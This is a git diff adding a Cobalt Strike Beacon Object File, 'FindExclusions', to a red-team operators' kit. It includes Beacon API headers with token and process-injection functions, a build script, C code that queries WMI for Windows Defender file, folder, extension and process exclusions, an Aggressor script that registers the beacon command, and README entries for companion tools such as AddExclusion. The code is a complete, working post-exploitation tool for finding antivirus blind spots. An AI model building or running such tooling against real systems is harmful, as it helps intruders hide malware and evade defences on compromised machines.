+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/FindExclusions/bofcompile.bat

@@ -0,0 +1,5 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc findexclusions.c
+move /y findexclusions.obj findexclusions.o
+

KIT/FindExclusions/findexclusions.c

@@ -0,0 +1,223 @@
+#include <stdio.h>
+#include <Windows.h>
+#include <wbemidl.h>
+#include "findexclusions.h"
+#include "beacon.h"
+
+#pragma comment(lib, "wbemuuid.lib")
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "oleaut32.lib")
+
+
+//START TrustedSec BOF print code: https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/src/common/base.c
+#ifndef bufsize
+#define bufsize 8192
+#endif
+char *output = 0;  
+WORD currentoutsize = 0;
+HANDLE trash = NULL; 
+int bofstart();
+void internal_printf(const char* format, ...);
+void printoutput(BOOL done);
+
+int bofstart() {   
+    output = (char*)MSVCRT$calloc(bufsize, 1);
+    currentoutsize = 0;
+    return 1;
+}
+
+void internal_printf(const char* format, ...){
+    int buffersize = 0;
+    int transfersize = 0;
+    char * curloc = NULL;
+    char* intBuffer = NULL;
+    va_list args;
+    va_start(args, format);
+    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); 
+    va_end(args);
+    
+    if (buffersize == -1) return;
+    
+    char* transferBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, bufsize);
+	intBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, buffersize);
+    va_start(args, format);
+    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); 
+    va_end(args);
+    if(buffersize + currentoutsize < bufsize) 
+    {
+        MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
+        currentoutsize += buffersize;
+    } else {
+        curloc = intBuffer;
+        while(buffersize > 0)
+        {
+            transfersize = bufsize - currentoutsize;
+            if(buffersize < transfersize) 
+            {
+                transfersize = buffersize;
+            }
+            MSVCRT$memcpy(output+currentoutsize, curloc, transfersize);
+            currentoutsize += transfersize;
+            if(currentoutsize == bufsize)
+            {
+                printoutput(FALSE); 
+            }
+            MSVCRT$memset(transferBuffer, 0, transfersize); 
+            curloc += transfersize; 
+            buffersize -= transfersize;
+        }
+    }
+	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, intBuffer);
+	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, transferBuffer);
+}
+
+void printoutput(BOOL done) {
+    char * msg = NULL;
+    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
+    currentoutsize = 0;
+    MSVCRT$memset(output, 0, bufsize);
+    if(done) {MSVCRT$free(output); output=NULL;}
+}
+//END TrustedSec BOF print code.
+
+
+
+int EnumerateDefenderExclusions() {
+    HRESULT hr;
+	int result = 0;
+    
+    hr = OLE32$CoInitializeEx(0, COINIT_APARTMENTTHREADED);
+    if (FAILED(hr)) goto Cleanup;
+	
+	IWbemLocator *pLoc = NULL;
+	IID CLSIDWbemLocator = {0x4590f811, 0x1d3a, 0x11d0, {0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24}};
+	IID IIDIWbemLocator = {0xdc12a687, 0x737f, 0x11cf, {0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24}};
+    hr = OLE32$CoCreateInstance(&CLSIDWbemLocator, 0, CLSCTX_INPROC_SERVER, &IIDIWbemLocator, (LPVOID *)&pLoc);
+    if (FAILED(hr)) goto Cleanup;
+	
+	IWbemServices *pSvc = NULL;
+    hr = pLoc->lpVtbl->ConnectServer(pLoc, OLEAUT32$SysAllocString(L"ROOT\\Microsoft\\Windows\\Defender"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
+    if (FAILED(hr)) goto Cleanup;
+
+    hr = OLE32$CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
+
+    IEnumWbemClassObject* pEnumerator = NULL;
+	hr = pSvc->lpVtbl->ExecQuery(pSvc, OLEAUT32$SysAllocString(L"WQL"), OLEAUT32$SysAllocString(L"SELECT * FROM MSFT_MpPreference"), WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator);
+	if (FAILED(hr)) goto Cleanup;
+
+	internal_printf("\nExclusion enumeration results:\n====================================================\n");
+	
+	ULONG returnedCount = 0;
+	IWbemClassObject *pResult = NULL;
+	while (pEnumerator) {
+		hr = pEnumerator->lpVtbl->Next(pEnumerator, WBEM_INFINITE, 1, &pResult, &returnedCount);
+		if (0 == returnedCount) break;
+		
+		//folder and files
+		VARIANT pathName;
+		hr = pResult->lpVtbl->Get(pResult, L"ExclusionPath", 0, &pathName, 0, 0);
+		if (SUCCEEDED(hr)) {
+			if (pathName.vt == VT_NULL) {
+				internal_printf("[-] No file or folder exclusion configured\n");
+				result = 1; 
+			} else if (pathName.vt == (VT_ARRAY | VT_BSTR)) {
+				
+				SAFEARRAY* sa = pathName.parray;
+				BSTR* bstrArray;
+				long lBound, uBound;
+
+				OLEAUT32$SafeArrayGetLBound(sa, 1, &lBound);
+				OLEAUT32$SafeArrayGetUBound(sa, 1, &uBound);
+				OLEAUT32$SafeArrayAccessData(sa, (void**)&bstrArray);
+
+				for (long i = lBound; i <= uBound; i++) {
+					if (MSVCRT$wcscmp(bstrArray[i], L"N/A: Must be an administrator to view exclusions") == 0) {
+						BeaconPrintf(CALLBACK_ERROR, "Access Denied! The current user does not have sufficient permissions to enumerate exclusions.\n");
+						goto Cleanup;
+					} else {
+						internal_printf("[+] Found folder/file exclusion: %ls\n", bstrArray[i]);
+						result = 1; 
+					}
+				}
+				OLEAUT32$SafeArrayUnaccessData(sa);
+			} else BeaconPrintf(CALLBACK_ERROR, "Error occurred! Couldn't properly parse path data with error code: %d\n", pathName.vt);
+
+			OLEAUT32$VariantClear(&pathName);
+		}
+		
+		//extention
+		VARIANT extName;
+		hr = pResult->lpVtbl->Get(pResult, L"ExclusionExtension", 0, &extName, 0, 0);
+		if (SUCCEEDED(hr)) {
+			if (extName.vt == VT_NULL) {
+				internal_printf("[-] No extention exclusion configured\n");
+				result = 1; 
+			} else if (extName.vt == (VT_ARRAY | VT_BSTR)) {
+				
+				SAFEARRAY* sa = extName.parray;
+				BSTR* bstrArray;
+				long lBound, uBound;
+
+				OLEAUT32$SafeArrayGetLBound(sa, 1, &lBound);
+				OLEAUT32$SafeArrayGetUBound(sa, 1, &uBound);
+				OLEAUT32$SafeArrayAccessData(sa, (void**)&bstrArray);
+
+				for (long i = lBound; i <= uBound; i++) {
+					internal_printf("[+] Found extention exclusion: %ls\n", bstrArray[i]);
+					result = 1; 
+				}
+				OLEAUT32$SafeArrayUnaccessData(sa);
+			} else BeaconPrintf(CALLBACK_ERROR, "Error occurred! Couldn't properly parse extention data with error code: %d\n", extName.vt);
+			
+			OLEAUT32$VariantClear(&extName);
+		}
+		
+		//processes
+		VARIANT procName;
+		hr = pResult->lpVtbl->Get(pResult, L"ExclusionProcess", 0, &procName, 0, 0);
+		if (SUCCEEDED(hr)) {
+			if (procName.vt == VT_NULL) {
+				internal_printf("[-] No process exclusion configured\n");
+				result = 1; 
+			} else if (procName.vt == (VT_ARRAY | VT_BSTR)) {
+				
+				SAFEARRAY* sa = procName.parray;
+				BSTR* bstrArray;
+				long lBound, uBound;
+
+				OLEAUT32$SafeArrayGetLBound(sa, 1, &lBound);
+				OLEAUT32$SafeArrayGetUBound(sa, 1, &uBound);
+				OLEAUT32$SafeArrayAccessData(sa, (void**)&bstrArray);
+
+				for (long i = lBound; i <= uBound; i++) {
+					internal_printf("[+] Found process exclusion: %ls\n", bstrArray[i]);
+					result = 1; 
+				}
+				OLEAUT32$SafeArrayUnaccessData(sa);
+			} else BeaconPrintf(CALLBACK_ERROR, "Error occurred! Couldn't properly parse process data with error code: %d\n", procName.vt);
+			
+			OLEAUT32$VariantClear(&procName);
+		}
+	}
+	
+Cleanup:
+    if (pSvc) pSvc->lpVtbl->Release(pSvc);
+    if (pLoc) pLoc->lpVtbl->Release(pLoc);
+    if (pEnumerator) pEnumerator->lpVtbl->Release(pEnumerator);
+	if (pResult) pResult->lpVtbl->Release(pResult);
+    OLE32$CoUninitialize();
+
+	return result;
+}
+
+
+int go() {
+	int result = 0; 
+	
+	if(!bofstart()) return;
+	
+	result = EnumerateDefenderExclusions();
+	if(result) printoutput(TRUE);
+	
+	return 0;
+}

KIT/FindExclusions/findexclusions.cna

@@ -0,0 +1,26 @@
+# author REDMED-X
+
+beacon_command_register(
+	"findexclusions", "Check the AV for excluded files, folders, extentions and processes.",
+	"INFO:\nCheck the AV for excluded files, folders, extentions and processes. Currently only Windows Defender exclusions are supported.\n\n" .
+	"USAGE:\nfindexclusions\n\n");
+	
+alias findexclusions {
+    $bid = $1;
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("findexclusions.o"));
+    $data   = readb($handle, -1);
+    closef($handle);
+
+    # Pack our arguments
+    $arg_data  = bof_pack($bid);
+
+    blog($bid, "Tasked to enumerate exclusions..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}
+
+
+
+
+

KIT/FindExclusions/findexclusions.h

@@ -0,0 +1,27 @@
+#include <windows.h>  
+
+//EnumerateExclusions
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit);
+DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize(void);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR, LONG, SOLE_AUTHENTICATION_SERVICE*, void*, DWORD, DWORD, void*, DWORD, void*);
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown*, DWORD, DWORD, OLECHAR*, DWORD, DWORD, RPC_AUTH_IDENTITY_HANDLE, DWORD);
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY*, unsigned int, long*);
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY*, unsigned int, long*);
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY*, void**);
+DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY* psa);
+DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg);
+WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *);
+WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
+WINBASEAPI int WINAPI MSVCRT$wcscmp(const wchar_t* str1, const wchar_t* str2);
+
+//bofstart + internal_printf + printoutput
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int WINAPI MSVCRT$vsnprintf(char* buffer, size_t count, const char* format, va_list arg);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI void* WINAPI MSVCRT$memcpy(void* dest, const void* src, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);

README.md

@@ -6,6 +6,7 @@ The following tools are currently in the operators' kit:
 
 |Name|Decription|
 |----|----------|
+|**[AddExclusion](KIT/AddExclusion)**|Add a new exclusion to Windows Defender for a folder, file, process or extension.|
 |**[AddFirewallRule](KIT/AddFirewallRule)**|Add a new inbound/outbound firewall rule.|
 |**[AddLocalCert](KIT/AddLocalCert)**|Add a (self signed) certificate to a specific local computer certificate store.|
 |**[AddTaskScheduler](KIT/AddTaskScheduler)**|Create a scheduled task on the current- or remote host.|
@@ -20,7 +21,9 @@ The following tools are currently in the operators' kit:
 |**[EnumSecProducts](KIT/EnumSecProducts)**|Enumerate security products (like AV/EDR) that are running on the current/remote host.|
 |**[EnumShares](KIT/EnumShares)**|Enumerate remote shares and your access level using a predefined list with hostnames.|
 |**[EnumTaskScheduler](KIT/EnumTaskScheduler)**|Enumerate all scheduled tasks in the root folder.|
+|**[EnumWSC](KIT/EnumWSC)**|List what security products are registered in Windows Security Center.|
 |**[FindDotnet](KIT/FindDotnet)**|Find processes that most likely have .NET loaded.|
+|**[FindExclusions](KIT/FindExclusions)**|Check the AV for excluded files, folders, extentions and processes.|
 |**[FindFile](KIT/FindFile)**|Search for matching files based on a word, extention or keyword in the file content.|
 |**[FindHandle](KIT/FindHandle)**|Find "process" and "thread" handle types between processes.|
 |**[FindLib](KIT/FindLib)**|Find loaded module(s) in remote process(es).|